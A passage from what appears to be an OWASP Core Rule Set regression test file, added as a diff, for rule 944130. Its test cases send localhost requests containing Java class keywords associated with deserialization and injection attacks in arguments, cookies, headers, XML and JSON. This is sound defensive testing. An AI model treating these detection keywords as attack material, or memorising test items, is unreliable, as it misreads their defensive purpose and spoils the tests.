"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: com.opensymphony.xwork2=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-5 + desc: "Request header test 
includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: com.opensymphony.xwork2 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-6 + desc: "XML attribute value includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-7 + desc: "XML element value includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "com.opensymphony.xwork2" + output: + log_contains: "id \"944130\"" + - test_title: 944130-8 + desc: "Nested XML element value includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "com.opensymphony.xwork2" + output: + log_contains: "id \"944130\"" + - test_title: 944130-9 + desc: "Content-Type text/plain includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=com.opensymphony.xwork2" + output: + log_contains: "id \"944130\"" + - test_title: 944130-10 + desc: "Content-Type application/json arg value includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"com.opensymphony.xwork2\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-11 + desc: "Content-Type application/json arg name includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: 
"{\"com.opensymphony.xwork2\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-12 + desc: "Argument test includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=com.sun.org.apache" + output: + log_contains: "id \"944130\"" + - test_title: 944130-13 + desc: "Argument name includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "com.sun.org.apache=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-14 + desc: "Cookie test includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=com.sun.org.apache + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-15 + desc: "Cookie name includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + 
User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: com.sun.org.apache=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-16 + desc: "Request header test includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: com.sun.org.apache + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-17 + desc: "XML attribute value includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-18 + desc: "XML element value includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + 
version: "HTTP/1.0" + data: "com.sun.org.apache" + output: + log_contains: "id \"944130\"" + - test_title: 944130-19 + desc: "Nested XML element value includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "com.sun.org.apache" + output: + log_contains: "id \"944130\"" + - test_title: 944130-20 + desc: "Content-Type text/plain includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=com.sun.org.apache" + output: + log_contains: "id \"944130\"" + - test_title: 944130-21 + desc: "Content-Type application/json arg value includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"com.sun.org.apache\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-22 + desc: "Content-Type application/json arg name includes keyword com.sun.org.apache" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: 
"localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"com.sun.org.apache\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-23 + desc: "Argument test includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.BufferedInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-24 + desc: "Argument name includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.BufferedInputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-25 + desc: "Cookie test includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + Cookie: test=java.io.BufferedInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-26 + desc: "Cookie name includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.BufferedInputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-27 + desc: "Request header test includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.BufferedInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-28 + desc: "XML attribute value includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-29 + desc: "XML element 
value includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.BufferedInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-30 + desc: "Nested XML element value includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.BufferedInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-31 + desc: "Content-Type text/plain includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.BufferedInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-32 + desc: "Content-Type application/json arg value includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.BufferedInputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-33 + desc: "Content-Type application/json arg name includes keyword java.io.BufferedInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.BufferedInputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-34 + desc: "Argument test includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.BufferedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-35 + desc: "Argument name includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" 
+ version: "HTTP/1.0" + data: "java.io.BufferedReader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-36 + desc: "Cookie test includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.BufferedReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-37 + desc: "Cookie name includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.BufferedReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-38 + desc: "Request header test includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.BufferedReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-39 + desc: "XML attribute value includes keyword java.io.BufferedReader" + stages: + 
- stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-40 + desc: "XML element value includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.BufferedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-41 + desc: "Nested XML element value includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.BufferedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-42 + desc: "Content-Type text/plain includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.BufferedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-43 + desc: "Content-Type application/json arg value includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.BufferedReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-44 + desc: "Content-Type application/json arg name includes keyword java.io.BufferedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.BufferedReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-45 + desc: "Argument test includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-46 + desc: "Argument name includes keyword 
java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ByteArrayInputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-47 + desc: "Cookie test includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.ByteArrayInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-48 + desc: "Cookie name includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.ByteArrayInputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-49 + desc: "Request header test includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.ByteArrayInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-50 + desc: "XML attribute value includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-51 + desc: "XML element value includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.ByteArrayInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-52 + desc: "Nested XML element value includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: 
"java.io.ByteArrayInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-53 + desc: "Content-Type text/plain includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-54 + desc: "Content-Type application/json arg value includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.ByteArrayInputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-55 + desc: "Content-Type application/json arg name includes keyword java.io.ByteArrayInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.ByteArrayInputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-56 + desc: "Argument test includes keyword java.io.ByteArrayOutputStream" + stages: + - stage: + input: + 
